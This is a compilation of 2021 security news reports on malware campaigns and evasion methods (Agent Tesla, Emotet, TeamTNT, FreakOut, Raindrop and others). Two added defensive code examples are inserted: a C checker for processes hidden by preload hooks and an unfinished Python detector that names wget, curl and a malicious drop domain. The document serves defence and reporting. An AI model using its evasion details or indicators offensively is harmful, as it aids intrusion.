“The numerous well-implemented features and the network evasion techniques show the attackers behind Kobalos are much more knowledgeable than the typical malware author targeting Linux and other non-Windows systems,” ESET said in its report. “Their targets, being quite high profile, also show that the objective of the Kobalos operators isn’t to compromise as many systems as possible. Its small footprint and network evasion techniques may explain why it went undetected until we approached victims with the results of our internet-wide scan.”


Agent Tesla Malware Spotted Using New Delivery & Evasion Techniques
3.2.2021 
Virus  Thehackernews

Security researchers on Tuesday uncovered new delivery and evasion techniques adopted by Agent Tesla remote access trojan (RAT) to get around defense barriers and monitor its victims.

Typically spread through social engineering lures, the Windows spyware not only now targets Microsoft's Antimalware Scan Interface (AMSI) in an attempt to defeat endpoint protection software, it also employs a multi-stage installation process and makes use of Tor and Telegram messaging API to communicate with a command-and-control (C2) server.

Cybersecurity firm Sophos, which observed two versions of Agent Tesla — version 2 and version 3 — currently in the wild, said the changes are yet another sign of Agent Tesla's constant evolution designed to make a sandbox and static analysis more difficult.

"The differences we see between v2 and v3 of Agent Tesla appear to be focused on improving the success rate of the malware against sandbox defenses and malware scanners, and on providing more C2 options to their attacker customers," Sophos researchers noted.

A .NET based keylogger and information stealer, Agent Tesla has been deployed in a number of attacks since late 2014, with additional features incorporated over time that allows it to monitor and collect the victim's keyboard input, take screenshots, and exfiltrate credentials belonging to a variety of software such as VPN clients, FTP and email clients, and web browsers.

Last May, during the height of the pandemic, a variant of the malware was found to spread via COVID-themed spam campaigns to steal Wi-Fi passwords alongside other information – such as Outlook email credentials – from target systems.

Then in August 2020, the second version of Agent Tesla increased the number of applications targeted for credential theft to 55, the results of which were then transmitted to an attacker-controlled server via SMTP or FTP.

While the use of SMTP to send information to a mail server controlled by the attacker was spotted way back in 2018, one of the new versions identified by Sophos was also found to leverage Tor proxy for HTTP communications and messaging app Telegram's API to relay the information to a private chat room.

Besides this, Agent Tesla now attempts to modify code in AMSI in a bid to skip scans of malicious payloads fetched by the first-stage downloader, which then grabs obfuscated base64-encoded code from Pastebin (or Hastebin) that acts as the loader for the Agent Tesla malware.

AMSI is an interface standard that allows applications and services to be integrated with any existing antimalware product that's present on a Windows machine.

Furthermore, to achieve persistence, the malware copies itself to a folder and sets that folder's attributes to "Hidden" and "System" in order to conceal it from view in Windows Explorer, the researchers explained.

"The most widespread delivery method for Agent Tesla is malicious spam," Sophos threat researchers Sean Gallagher and Markel Picado said.

"The email accounts used to spread Agent Tesla are often legitimate accounts that have been compromised. Organizations and individuals should, as always, treat email attachments from unknown senders with caution, and verify attachments before opening them."


Alleged Gaming Software Supply-Chain Attack Installs Spyware
2.2.2021 
Virus  Threatpost

Researchers allege that software used for downloading Android apps onto PCs and Macs has been compromised to install malware onto victim devices.

Researchers allege that attackers have compromised the update mechanism of NoxPlayer, software that allows gamers to run Android apps on their PCs or Macs. They then installed malware with surveillance-related capabilities onto victims’ devices.

NoxPlayer is developed by BigNox, which is a China-based company that claims that it has over 150 million users worldwide (notably, however, BigNox users are predominantly in Asian countries). When contacted by researchers, BigNox denied being affected by the attack. Threatpost has reached out to BigNox for further comment.

“We have contacted BigNox about the intrusion, and they denied being affected,” said Ignacio Sanmillan, malware researcher with ESET, on Monday. “We have also offered our support to help them past the disclosure in case they decide to conduct an internal investigation.”

On the heels of the alleged attack, which occurred in January 2021, three different malware families have been deployed – reportedly from tailored, malicious updates – to a very select set of victims. Researchers said that out of the more than 100,000 users in their telemetry who have NoxPlayer installed on their machines, only five users received a malicious update, showing the attack is a “highly targeted operation.” These victims are based in Taiwan, Hong Kong and Sri Lanka.

“We were unsuccessful finding correlations that would suggest any relationships among victims,” said Sanmillan. “However, based on the compromised software in question and the delivered malware exhibiting surveillance capabilities, we believe this may indicate the intent of collecting intelligence on targets somehow involved in the gaming community.”

Researchers claim that the attack vector stems from NoxPlayer’s update mechanism. They said they have “sufficient evidence” to show that the BigNox infrastructure (res06.bignox.com) was compromised to host malware. They also assert that BigNox’s HTTP API infrastructure (api.bignox.com), used for requests and responses between the clients and BigNox servers, may have been compromised as well.

The location of victims. Credit: ESET

A normal NoxPlayer update process works as follows: Upon launch NoxPlayer queries the update server via the BigNox HTTP API (api.bignox.com) in order to retrieve specific update information. If NoxPlayer detects a newer version of the software, it prompts the user with an option to install it. If the user chooses to update, the main NoxPlayer binary application (Nox.exe) supplies update parameters received to another binary in its toolbox (NoxPack.exe), which is in charge of downloading the update.

For victims, the attack occurs when the BigNox API server responds to the client request with specific update information, including the URL to download the update from BigNox legitimate infrastructure. Here, researchers believe that either the legitimate update stored in BigNox infrastructure may have been replaced with malware, or that the URL given by the BigNox API server is not used for legitimate updates. Either way, malicious files are then deployed via the update mechanism, and malware is then installed on the victim’s machine.

Unlike legitimate BigNox updates, these malicious files are not digitally signed, strongly suggesting that the BigNox build system was not compromised, but just its systems that distribute updates, said researchers.

Also, “we are highly confident that these additional updates were performed by Nox.exe supplying specific parameters to NoxPack.exe, suggesting that the BigNox API mechanism may have also been compromised to deliver tailored malicious updates,” said Sanmillan.

While it could be argued that the attack is a man-in-the-middle (MiTM) attack rather than a full-on compromise, researchers said they believe this is “unlikely.” MiTM attacks occur when an attacker intercepts communications between two parties in order to modify traffic traveling between the two. However, researchers said the attacker already had a foothold on the BigNox infrastructure. Also, they said they were unable to reproduce the download of the malware samples while using the HTTPS protocol (hosted on res06.bignox.com) from a test machine.

Researchers observed three different malware variants utilized in the attacks. While the first malware variant had not been previously detected, the second variant deployed a final payload consisting of a variant of the known Gh0st malware, a remote access trojan (RAT) that has keylogger capabilities. The third variant meanwhile deployed the known PoisonIvy RAT, which has spying capabilities, as its final payload.

While all three malware samples had slight variations in how they were deployed and their bundled components, all had basic monitoring capabilities. For instance, all malware variants were able to download specific files and directories from the victims, delete specified files from the disk, and upload files.

The targeted gaming victimology makes this campaign stand out, said researchers, as cyberespionage attacks are typically instead targeted at governments or human-rights activists.

“We have detected various supply-chain attacks in the last year, such as Operation SignSight or the compromise of Able Desktop among others,” said Sanmillan. “However, the supply-chain compromise involved in Operation NightScout is particularly interesting due to the targeted vertical, as we rarely encounter many cyberespionage operations targeting online gamers.”


Hijacked Perl.com Domain Hosted on IP Address Linked to Malicious Activity
2.2.2021 
Virus  Securityweek

The Perl.com domain, which since 1997 had been serving articles about Perl programming, was hijacked last week.

Managed by The Perl Foundation, the site had David Farrell as editor, but received contributions from numerous Perl programming language enthusiasts, including Brian Foy, who also authored several books on Perl.

The Perl Foundation announced last week that the domain was hijacked, warning users to steer clear of Perl.com, due to possible connections to sites associated with malware distribution.

“The perl.com domain was hijacked this morning, and is currently pointing to a parking site. […] We encourage you NOT to visit the domain, as there are some signals that it may be related to sites that have distributed malware in the past,” the announcement reads.

Users who might have selected Perl.com as their CPAN mirror are advised to update their mirror in CPAN.pm.

While work is being done to recover the domain, Perl enthusiasts looking for articles on the programming language have been redirected to perldotcom.perl.org, which hosts the content previously present on the hijacked website.

The issue that led to the hijack, Foy explains, was “some snafu with the perl.com domain registration.” Because of that, an unknown party was able to register the domain for the next ten years.

Foy later said the incident apparently involved an "account hack" and it was not an isolated incident, with many other domains impacted.

Shortly after the Perl.com domain was hijacked, The Register found it up for sale on afternic.com (part of GoDaddy) for $190,000. The listing was pulled shortly after.

While Perl.com can no longer be accessed over HTTPS, attempting to visit the HTTP version “sets a few tracking cookies, fetches some JavaScript, and renders as a blank page,” Sophos reveals.

The Google Cloud IP address that Perl.com is now hosted at, namely 35.186.238[.]101, is known to have been used for malware distribution in the past, including for the Locky ransomware, but also as a command and control (C&C) server, BleepingComputer notes.

Although the domain doesn’t appear malicious for the time being, users should refrain from accessing Perl.com until the original registrants are able to regain control of it.


Rocke Group’s Malware Now Has Worm Capabilities

29.1.2021  Virus  Threatpost

The Pro-Ocean cryptojacking malware now comes with the ability to spread like a worm, as well as harboring new detection-evasion tactics.

Researchers have identified an updated malware variant used by the cybercrime gang Rocke Group that targets cloud infrastructures with crypto-jacking attacks.

The malware, called Pro-Ocean, was first discovered in 2019 and has now been beefed up with “worm” capabilities and rootkit detection-evasion features.

“This malware is an example that demonstrates that cloud providers’ agent-based security solutions may not be enough to prevent evasive malware targeted at public cloud infrastructure,” said Aviv Sasson with Palo Alto Networks on Thursday. “As we saw, this sample has the capability to delete some cloud providers’ agents and evade their detection.”

Since its discovery in 2018, the Rocke Group has widened its targeting of cloud applications – including Apache ActiveMQ, Oracle WebLogic and open-source data structure store Redis – for mining Monero. Researchers say that since these attacks initially broke out, many cybersecurity companies have kept Pro-Ocean on their radar. Rocke Group’s latest update aims to sidestep these detection and mitigation efforts.

Pro-Ocean Malware
Pro-Ocean uses a variety of known vulnerabilities to target cloud applications. These include a critical flaw in Apache ActiveMQ (CVE-2016-3088) and a high-severity vulnerability in Oracle WebLogic (CVE-2017-10271). The malware has also been spotted targeting unsecure instances of Redis.

Once downloaded, the malware attempts to remove other malware and cryptominers, including Luoxk, BillGates, XMRig and Hashfish. It then kills any processes using the CPU heavily, so that its XMRig miner can utilize 100 percent of the CPU juice needed to sow Monero.

The malware is made up of four components: a rootkit module that installs a rootkit and various other malicious services; a mining module that runs the XMRig miner; a Watchdog module that executes two Bash scripts (these check that the malware is running and search for any processes using the CPU heavily); and an infection module that contains “worm” capabilities.

New Features
The latter “worm” feature is a new addition for Pro-Ocean, which previously only infected victims manually. The malware now uses a Python infection script to retrieve the public IP address of the victim’s machine. It does so by accessing an online service with the address “ident.me,” which reports the caller's public IP address. Then, the script tries to infect all the machines in the same 16-bit subnet (e.g. 10.0.X.X).

“It does this by blindly executing public exploits one after the other in the hope of finding unpatched software it can exploit,” said Sasson.

Pro-Ocean’s modular structure. Credit: Palo Alto Networks

Other threat groups have previously adopted worm-like functionality into their Monero-chugging malware. TeamTNT’s cryptomining worm, for instance, was found spreading through the Amazon Web Services (AWS) cloud and collecting credentials in August.

The Pro-Ocean malware has also added new rootkit capabilities that cloak its malicious activity.

These updated features exist in Libprocesshider, a library for hiding processes used by the malware. This library was utilized by previous versions of Pro-Ocean – however, in the new version, the developer of the code has added several new code snippets to the library for further functionalities.

For example, before calling the libc function open (libc is a library of standard functions that can be used by all C programs), a malicious function determines whether the file needs to be hidden to obfuscate malicious activities.

“If it determines that the file needs to be hidden, the malicious function will return a ‘No such file or directory’ error, as if the file in question does not exist,” said Sasson.

Researchers said they believe that the Rocke Group will continue to actively update its malware, particularly as the cloud grows as a lucrative target for attackers.

“Cryptojacking malware targeting the cloud is evolving as attackers understand the potential of that environment to mine for crypto coins. We previously saw simpler attacks by the Rocke Group, but it seems this group presents an ongoing, growing threat. This cloud-targeted malware is not something ordinary since it has worm and rootkit capabilities. We can assume that the growing trend of sophisticated attacks on the cloud will continue.”


European Authorities Disrupt Emotet — World's Most Dangerous Malware
29.1.2021 
Virus  Thehackernews
Law enforcement agencies from as many as eight countries dismantled the infrastructure of Emotet, a notorious email-based Windows malware behind several botnet-driven spam campaigns and ransomware attacks over the past decade.

The coordinated takedown of the botnet on Tuesday — dubbed "Operation Ladybird" — is the result of a joint effort between authorities in the Netherlands, Germany, the U.S., the U.K., France, Lithuania, Canada, and Ukraine to take control of servers used to run and maintain the malware network.

"The Emotet infrastructure essentially acted as a primary door opener for computer systems on a global scale," Europol said. "What made Emotet so dangerous is that the malware was offered for hire to other cybercriminals to install other types of malware, such as banking Trojans or ransomware, onto a victim's computer."

More Than a Malware
Since its first identification in 2014, Emotet has evolved from its initial roots as a credential stealer and banking Trojan to a powerful "Swiss Army knife" that can serve as a downloader, information stealer, and spambot depending on how it's deployed.

Known for being constantly under development, the cybercrime service updates itself regularly to improve stealthiness and persistence, and to add new spying capabilities through a wide range of modules, including a Wi-Fi spreader to identify and compromise fresh victims connected to nearby Wi-Fi networks.

Last year, the malware was linked to several botnet-driven spam campaigns and even capable of delivering more dangerous payloads such as TrickBot and Ryuk ransomware by renting its botnet of compromised machines to other malware groups.

"The Emotet group managed to take e-mail as an attack vector to a next level," Europol said.

700 Emotet Servers Seized
The U.K.'s National Crime Agency (NCA) said the operation took nearly two years to map the infrastructure of Emotet, with multiple properties in the Ukrainian city of Kharkiv raided to confiscate computer equipment used by the hackers.

The Ukrainian Cyberpolice Department also arrested two individuals allegedly involved in the botnet's infrastructure maintenance, both of whom are facing 12 years in prison if found guilty.

"Analysis of accounts used by the group behind Emotet showed $10.5 million being moved over a two-year period on just one Virtual Currency platform," the NCA said, adding "almost $500,000 had been spent by the group over the same period to maintain its criminal infrastructure."

Globally, Emotet-linked damages are said to have cost about $2.5 billion, Ukrainian authorities said.

With at least 700 servers operated by Emotet across the world now having been taken down from the inside, machines infected by the malware are set to be directed to this law enforcement infrastructure, thus preventing further exploitation.

In addition, the Dutch National Police has released a tool to check for potential compromise, based on a dataset containing 600,000 e-mail addresses, usernames, and passwords that were identified during the operation.

Emotet to Be Wiped En Masse on April 25, 2021
The Dutch police, which seized two central servers located in the country, said it has deployed a software update to neutralize the threat posed by Emotet effectively.

"All infected computer systems will automatically retrieve the update there, after which the Emotet infection will be quarantined," the agency said. According to a tweet from a security researcher who goes by the Twitter handle milkream, Emotet is expected to be wiped on April 25, 2021, at 12:00 local time from all compromised machines.

Given the nature of the takedown operation, it remains to be seen if Emotet can stage a comeback. If it does, it wouldn't be the first time a botnet survived major disruption efforts.

As of writing, Abuse.ch's Feodo Tracker shows at least 20 Emotet servers are still online.

"A combination of both updated cybersecurity tools (antivirus and operating systems) and cybersecurity awareness is essential to avoid falling victim to sophisticated botnets like Emotet," Europol cautioned.

"Users should carefully check their e-mail and avoid opening messages and especially attachments from unknown senders. If a message seems too good to be true, it likely is and e-mails that implore a sense of urgency should be avoided at all costs."


TeamTNT Cloaks Malware With Open-Source Tool

28.1.2021  Virus  Threatpost

The detection-evasion tool, libprocesshider, hides TeamTNT’s malware from process-information programs.

The TeamTNT threat group has added a new detection-evasion tool to its arsenal, helping its cryptomining malware skirt by defense teams.

The TeamTNT cybercrime group is known for cloud-based attacks, including targeting Amazon Web Services (AWS) credentials in order to break into the cloud and use it to mine for the Monero cryptocurrency. It has also previously targeted Docker and Kubernetes cloud instances.

The new detection-evasion tool, libprocesshider, is copied from open-source repositories. The open-source tool, dating from 2014, is hosted on GitHub and is described as having capabilities to “hide a process under Linux using the ld preloader.”

“While the new functionality of libprocesshider is to evade detection and other basic functions, it acts as an indicator to consider when hunting for malicious activity on the host level,” said researchers with AT&T’s Alien Labs, on Wednesday.

The new tool is delivered within a base64-encoded script, hidden in the TeamTNT cryptominer binary, or via its Internet Relay Chat (IRC) bot, called TNTbotinger, which is capable of distributed denial of service (DDoS) attacks.

In the attack chain, after the base64-encoded script is downloaded, it runs through multiple tasks. These include modifying the network DNS configuration, setting persistence (through systemd), downloading the latest IRC bot configuration, clearing evidence of activities – and dropping and activating libprocesshider. The tool is dropped as a hidden Tape Archive file (also known as the Tar format, which is used for open-source software distribution) on the disk and then decompressed by the script and written to ‘/usr/local/lib/systemhealt.so’.

libprocesshider then hides the malicious process from process-information programs such as ‘ps’ and ‘lsof.’

These are both process-viewer tools, which use the file ‘/usr/bin/sbin.’ The ‘ps’ program (short for “process status”) displays currently running processes in many Unix-like operating systems; meanwhile, ‘lsof’ is a command (short for “list open files”), also utilized in Unix-like operating systems to, as the name suggests, report a list of all open files and the processes that opened them. Hiding the process from these two process-viewer tools would allow the attacker to cloak its malicious activity.

libprocesshider uses a process called preloading in order to hide its activity from ‘ps’ and ‘lsof.’ This process allows the system to load a custom shared library before other system libraries are loaded.

“If the custom shared library exports a function with the same signature of one located in the system libraries, the custom version will override it,” said researchers.

The custom shared library then lets the tool override the function readdir(). This function is used by processes like ‘ps’ to read the /proc directory to find running processes. The override modifies the return value so that, if ‘ps’ finds the malicious process, that entry is hidden.
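Both the libprocesshider readdir() hook described here and the open() hook added to the same library in the Pro-Ocean article earlier on this page interpose on libc calls only; a program that reads /proc through the raw kernel syscall sees the unfiltered directory. That gap gives a defender a cheap cross-check. The following is an added example, not code from the AT&T Alien Labs or Palo Alto Networks reports and not from libprocesshider itself, and it assumes a Linux host: it lists /proc once through readdir() and once through getdents64 and reports any PID that only the kernel view contains.

```c
#define _GNU_SOURCE
#include <dirent.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/syscall.h>

#define MAX_PIDS 65536
long syscall(long number, ...);  /* prototype kept explicit in case _GNU_SOURCE was set too late */

/* Record layout returned by the raw getdents64 syscall (Linux only). */
struct linux_dirent64 {
    unsigned long long d_ino;
    long long          d_off;
    unsigned short     d_reclen;
    unsigned char      d_type;
    char               d_name[];
};

/* /proc entries whose names are all digits are process IDs. */
static int is_pid_name(const char *s) {
    if (*s == '\0') return 0;
    for (; *s; s++)
        if (*s < '0' || *s > '9') return 0;
    return 1;
}

/* Libc view: the PIDs that opendir()/readdir() report. This is what ps and
 * lsof see, and it is exactly the call a preloaded readdir() hook filters. */
static int pids_via_readdir(int *out, int max) {
    DIR *d = opendir("/proc");
    if (!d) return -1;
    int n = 0;
    struct dirent *e;
    while (n < max && (e = readdir(d)) != NULL)
        if (is_pid_name(e->d_name)) out[n++] = atoi(e->d_name);
    closedir(d);
    return n;
}

/* Kernel view: the same directory read with the getdents64 syscall directly,
 * bypassing libc, so a user-space LD_PRELOAD hook cannot filter the result. */
static int pids_via_getdents(int *out, int max) {
    int fd = open("/proc", O_RDONLY | O_DIRECTORY);
    if (fd < 0) return -1;
    char buf[32768];
    int n = 0;
    for (;;) {
        long nread = syscall(SYS_getdents64, fd, buf, sizeof buf);
        if (nread <= 0) break;
        for (long pos = 0; pos < nread && n < max;) {
            struct linux_dirent64 *d = (struct linux_dirent64 *)(buf + pos);
            if (is_pid_name(d->d_name)) out[n++] = atoi(d->d_name);
            pos += d->d_reclen;
        }
    }
    close(fd);
    return n;
}

static int contains(const int *a, int n, int v) {
    for (int i = 0; i < n; i++)
        if (a[i] == v) return 1;
    return 0;
}

/* PIDs present in the kernel view but absent from the libc view. Separated
 * from the collectors so the comparison can be checked on constructed data. */
int find_hidden(const int *kernel, int nk, const int *libc, int nl,
                int *hidden, int max) {
    int h = 0;
    for (int i = 0; i < nk && h < max; i++)
        if (!contains(libc, nl, kernel[i])) hidden[h++] = kernel[i];
    return h;
}

/* Number of PIDs hidden from readdir(), or -1 if /proc cannot be read.
 * A process that exits between the two scans would look hidden, so every
 * candidate is confirmed against a second kernel-side scan before counting. */
int count_hidden_pids(void) {
    static int k1[MAX_PIDS], l[MAX_PIDS], k2[MAX_PIDS], cand[MAX_PIDS];
    int nk1 = pids_via_getdents(k1, MAX_PIDS);
    int nl  = pids_via_readdir(l, MAX_PIDS);
    if (nk1 < 0 || nl < 0) return -1;
    int nc = find_hidden(k1, nk1, l, nl, cand, MAX_PIDS);
    if (nc == 0) return 0;
    int nk2 = pids_via_getdents(k2, MAX_PIDS);
    if (nk2 < 0) return -1;
    int confirmed = 0;
    for (int i = 0; i < nc; i++)
        if (contains(k2, nk2, cand[i])) confirmed++;
    return confirmed;
}

int main(void) {
    int hidden = count_hidden_pids();
    printf("PIDs visible to the kernel but not to readdir(): %d\n", hidden);
    return hidden > 0 ? 1 : 0;   /* non-zero exit flags a likely preload hook */
}
```

On a clean host the count is 0; a non-zero count is a strong indicator that a readdir() interposer is loaded, and the complementary check is the presence of /etc/ld.so.preload, which is how such a library is loaded into every process.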

TeamTNT Continues to Add New Features
From time to time, TeamTNT has been seen deploying various updates to its cryptomining malware, including a new memory loader uncovered just a few weeks ago, which was based on Ezuri and written in Golang.

In August, TeamTNT’s cryptomining worm was discovered spreading through the AWS cloud and collecting credentials. Then, after a hiatus, the TeamTNT group returned in September to attack Docker and Kubernetes cloud instances by abusing a legitimate cloud-monitoring tool called Weave Scope.


Discord-Stealing Malware Invades npm Packages
23.1.2021  Virus  Threatpost

The CursedGrabber malware has infiltrated the open-source software code repository.

Three malicious software packages have been published to npm, a code repository for JavaScript developers to share and reuse code blocks. The packages represent a supply-chain threat given that they may be used as building blocks in various web applications; any applications corrupted by the code can steal tokens and other information from Discord users, researchers said.

Discord is designed for creating communities on the web, called “servers,” either as standalone forums or as part of another website. Users communicate with voice calls, video calls, text messaging, media and files. Discord “bots” are central to its function; these are AIs that can be programmed to moderate discussion forums, welcome and guide new members, police rule-breakers and perform community outreach. They’re also used to add features to the server, such as music, games, polls, prizes and more.

Discord tokens are used inside bot code to send commands back and forth to the Discord API, which in turn controls bot actions. If a Discord token is stolen, it would allow an attacker to hack the server.

As of Friday, the packages (named an0n-chat-lib, discord-fix and sonatype, all published by “scp173-deleted”) were still available for download. They make use of brandjacking and typosquatting to lure developers into thinking they’re legitimate. There is also “clear evidence that the malware campaign was using a Discord bot to generate fake download counts for the packages to make them appear more popular to potential users,” according to researchers at Sonatype.

The authors are the same operators behind the CursedGrabber Discord malware, the researchers said, and the packages share DNA with that threat.

The CursedGrabber Discord malware family, discovered in November, targets Windows hosts. It contains two .exe files which are invoked and executed via ‘postinstall’ scripts from the manifest file, ‘package.json’. One of the .exe files scans user profiles from multiple web browsers along with Discord leveldb files, steals Discord tokens, steals credit-card information, and sends user data via a webhook to the attacker. The second unpacks additional code with multiple capabilities, including privilege escalation, keylogging, taking screenshots, planting backdoors, accessing webcams and so on.

In the case of the three npm packages, these “contain variations of Discord token-stealing code from the Discord malware discovered by Sonatype on numerous occasions,” said Sonatype security researcher Ax Sharma, in a Friday blog posting.

Open-Source Software Repository Malware
Uploading malicious packages to code repositories is an increasingly common tactic used by malware operators. In December for instance, RubyGems, an open-source package repository and manager for the Ruby web programming language, had to take two of its software packages offline after they were found to be laced with malware.

The gems contained malware that ran itself persistently on infected Windows machines and replaced any Bitcoin or cryptocurrency wallet address it found on the user’s clipboard with the attacker’s. So, if a user of a corrupted web app built using the gems were to copy-paste a Bitcoin recipient wallet address somewhere on their system, the address would be replaced with that of the attacker.

“We have repeatedly seen…open-source malware striking GitHub, npm and RubyGems, attackers can exploit trust within the open-source community to deliver pretty much anything malicious, from sophisticated spying trojans like njRAT, to…CursedGrabber,” Sharma told Threatpost.

The latest findings reiterate that software supply-chain attacks will only become more common and underscore how crucial it is for organizations to protect against such attacks and to continuously improve their strategies against them, according to Sonatype.


New 'FreakOut' Malware Ensnares Linux Devices Into Botnet
21.1.2021 
BotNet  Virus  Securityweek

A recently identified piece of malware is targeting Linux devices to ensnare them into a botnet capable of malicious activities such as distributed denial of service (DDoS) and crypto-mining attacks.

Dubbed FreakOut, the malware is infecting devices that haven’t yet received patches for three relatively new vulnerabilities, including one that was made public earlier this month.

FreakOut, according to cybersecurity firm Check Point, can scan ports, harvest information, create and send data packets, perform network sniffing, and can also launch DDoS and network flooding attacks.

One of the vulnerabilities targeted by the botnet is CVE-2020-28188, an unauthenticated, remote command execution in TerraMaster TOS (TerraMaster Operating System) up to version 4.2.06. TerraMaster is a vendor of network- and direct-attached storage solutions.

The second one is CVE-2021-3007, a deserialization bug in Zend Framework that could lead to remote code execution. The popular collection of libraries for web application development is no longer supported by its maintainer.

FreakOut also targets CVE-2020-7961, a deserialization in Liferay Portal prior to 7.2.1 CE GA2, which could lead to the remote execution of arbitrary code via JSON web services (JSONWS). Liferay Portal is a free, open-source enterprise portal designed for building web portals and sites.

“Patches are available for all products impacted in these CVEs, and users of these products are advised to urgently check any of these devices they are using and to update and patch them to close off these vulnerabilities,” Check Point notes.

Once infected, the devices targeted by FreakOut are abused by the threat actors behind the attack to target more devices and expand the botnet, and further malicious activity, including lateral movement, crypto-mining, and DDoS attacks.

“Our research found evidence from the attack campaign’s main C&C server that around 185 devices had been hacked,” Check Point says.

Over the course of several days in January 2021, Check Point observed more than 380 attack attempts, with North America and Western Europe targeted the most. Finance (26.47%), government (23.53%), and healthcare (19.33%) were the industries affected the most.


SolarWinds Malware Arsenal Widens with Raindrop
20.1.2021  Virus  Threatpost

The post-compromise backdoor installs Cobalt Strike to help attackers move laterally through victim networks.

An additional piece of malware, dubbed Raindrop, has been unmasked in the sprawling SolarWinds supply-chain attacks. It was used in targeted attacks after the effort’s initial mass Sunburst compromise, researchers said.

The SolarWinds espionage attack, which has affected several U.S. government agencies, tech companies like Microsoft and FireEye, and many others, began with a poisoned software update that delivered the Sunburst backdoor to around 18,000 organizations last spring. After that broad-brush attack, the threat actors (believed to have links to Russia) selected specific targets to further infiltrate, which they did over the course of several months. The compromises were discovered in December.

Researchers have identified Raindrop as one of the tools used for those follow-on attacks. It’s a backdoor loader that drops Cobalt Strike in order to perform lateral movement across victims’ networks, according to Symantec analysts.

Cobalt Strike is a penetration-testing tool, which is commercially available. It sends out beacons to detect network vulnerabilities. When used for its intended purpose, it simulates an attack. Threat actors have since figured out how to turn it against networks to spread through an environment, exfiltrate data, deliver malware and more.

Three Raindrop Victims
Symantec observed the malware being used on three different victim computers. The first was a high-value target, with a computer access-and-management software installed. That management software could be used to access any of the other computers in the compromised organization.

In addition to installing Cobalt Strike, Symantec researchers also observed a legitimate version of 7-Zip being used to install Directory Services Internals (DSInternals) on the computer. 7-Zip is a free and open-source file archiver, while DSInternals is a legitimate tool which can be used for querying Active Directory servers and retrieving data, typically passwords, keys or password hashes.

In the second victim, Raindrop installed Cobalt Strike and then executed PowerShell commands that were bent on installing further instances of Raindrop on additional computers in the organization.

And in a third victim, Raindrop installed Cobalt Strike without an HTTP-based command-and-control server.

“It…was rather configured to use a network pipe over SMB,” according to Symantec’s analysis, released Monday. “It’s possible that in this instance, the victim computer did not have direct access to the internet, and so command-and-control was routed through another computer on the local network.”

Raindrop joins other custom malware that has been documented as being used in the attacks, including the Teardrop tool, which researchers said was delivered by the initial Sunburst backdoor.

Both Raindrop and Teardrop act as loaders for Cobalt Strike, and Raindrop samples using HTTPS C2 communication follow very similar configuration patterns to Teardrop, researchers said. However, Raindrop uses a different custom packer from Teardrop, and Raindrop isn’t fetched by Sunburst directly, researchers said.

Raindrop Malware Hides in 7-Zip
Symantec has uncovered that Raindrop is compiled as a DLL, which is built from a modified version of 7-Zip. The malware authors have in this case embedded an encoded payload within the 7-Zip code.

“The 7-Zip code is not utilized and is designed to hide malicious functionality added by the attackers,” the researchers explained. “Whenever the DLL is loaded, it starts a new thread from the DllMain subroutine that executes the malicious code.”

The malicious thread first delays execution in an effort to evade detection. Then, to find and extract the payload, the packer uses steganography, scanning the bytes starting from the beginning of the subroutine until it finds a code that signals the start of the payload code.

According to Symantec, extracting the code “involves simply copying data from pre-determined locations that happen to correspond to immediate values of the relevant machine instructions.”

Then it decrypts and decompresses the extracted payload using the AES and LZMA algorithms, respectively, and executes the decrypted payload as shellcode.

“The discovery of Raindrop is a significant step in our investigation of the SolarWinds attacks as it provides further insights into post-compromise activity at organizations of interest to the attackers,” according to the Symantec analysis. “While Teardrop was used on computers that had been infected by the original Sunburst Trojan, Raindrop appeared elsewhere on the network, being used by the attackers to move laterally and deploy payloads on other computers.”


Linux Devices Under Attack by New FreakOut Malware

20.1.2021  Virus  Threatpost

The FreakOut malware is adding infected Linux devices to a botnet, in order to launch DDoS and cryptomining attacks.

Researchers are warning a novel malware variant is targeting Linux devices, in order to add endpoints to a botnet to then be utilized in distributed-denial-of-service (DDoS) attacks and cryptomining.

The malware variant, called FreakOut, has a variety of capabilities. Those include port scanning, information gathering and data packet and network sniffing. It is actively adding infected Linux devices to a botnet, and has the ability to launch DDoS and network flooding attacks, as well as cryptomining activity.

“If successfully exploited, each device infected by the FreakOut malware can be used as a remote-controlled attack platform by the threat actors behind the attack, enabling them to target other vulnerable devices to expand their network of infected machines,” said researchers with Check Point Research in a Tuesday analysis.

FreakOut first targets Linux devices with specific products that have not been patched against various flaws.

These include a critical remote command execution flaw (CVE-2020-28188) in TerraMaster TOS (TerraMaster Operating System), a popular data storage device vendor. Versions prior to 4.2.06 are affected, while a patch will become available in 4.2.07.

Also targeted is a critical deserialization glitch (CVE-2021-3007) in Zend Framework, a popular collection of library packages that’s used for building web applications. This flaw exists in versions higher than Zend Framework 3.0.0.

“The maintainer no longer supports the Zend framework, and the laminas-http vendor released a relevant patch for this vulnerability; users should use the 2.14.x bugfix release (patch),” researchers said.

Finally, attackers target a critical deserialization of untrusted data issue (CVE-2020-7961) in Liferay Portal, a free, open-source enterprise portal with features for developing web portals and websites. Affected are versions prior to 7.2.1 CE GA2; an update is available in Liferay Portal 7.2 CE GA2 (7.2.1) or later.

“Patches are available for all products impacted in these CVEs, and users of these products are advised to urgently check any of these devices they are using and to update and patch them to close off these vulnerabilities,” said researchers.

Attack Surface
Researchers said that after exploiting one of these critical flaws, attackers then upload an obfuscated Python script called out.py, downloaded from the site https://gxbrowser[.]net.

“After the script is downloaded and given permissions (using the ‘chmod’ command), the attacker tries to run it using Python 2,” they said. “Python 2 reached EOL (end-of-life) last year, meaning the attacker assumes the victim’s device has this deprecated product installed.”
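As an added example, not Check Point's code, here is a Python detector that walks shell audit lines for the chain described above: a script fetched over HTTP, given permissions with chmod, then run with Python 2 on the same host within a short window. The log format, host names, user names and sample lines are constructed for the example; the only real value is the drop domain quoted from the report (defanged as gxbrowser[.]net above).

```python
"""Detect the FreakOut post-exploitation chain in shell/process audit logs.

Added example, not Check Point's code. It looks for download -> chmod ->
execute on one host inside a short window, rating Python 2 execution or a
fetch from the known drop domain as high severity. Log format and sample
lines are constructed for this example.
"""
from datetime import datetime, timedelta
from urllib.parse import urlparse
import posixpath
import shlex

# Domain named in the Check Point report quoted above (defanged there as gxbrowser[.]net).
KNOWN_DROP_HOSTS = {"gxbrowser.net"}
DOWNLOADERS = {"wget", "curl"}
INTERPRETERS = {"python", "python2", "python2.7", "sh", "bash"}
WINDOW = timedelta(minutes=5)

# Constructed sample lines: "<utc timestamp> <host> <user> <command line>".
SAMPLE_LOG = """\
2021-01-10T09:14:02Z nas01 root cd /tmp
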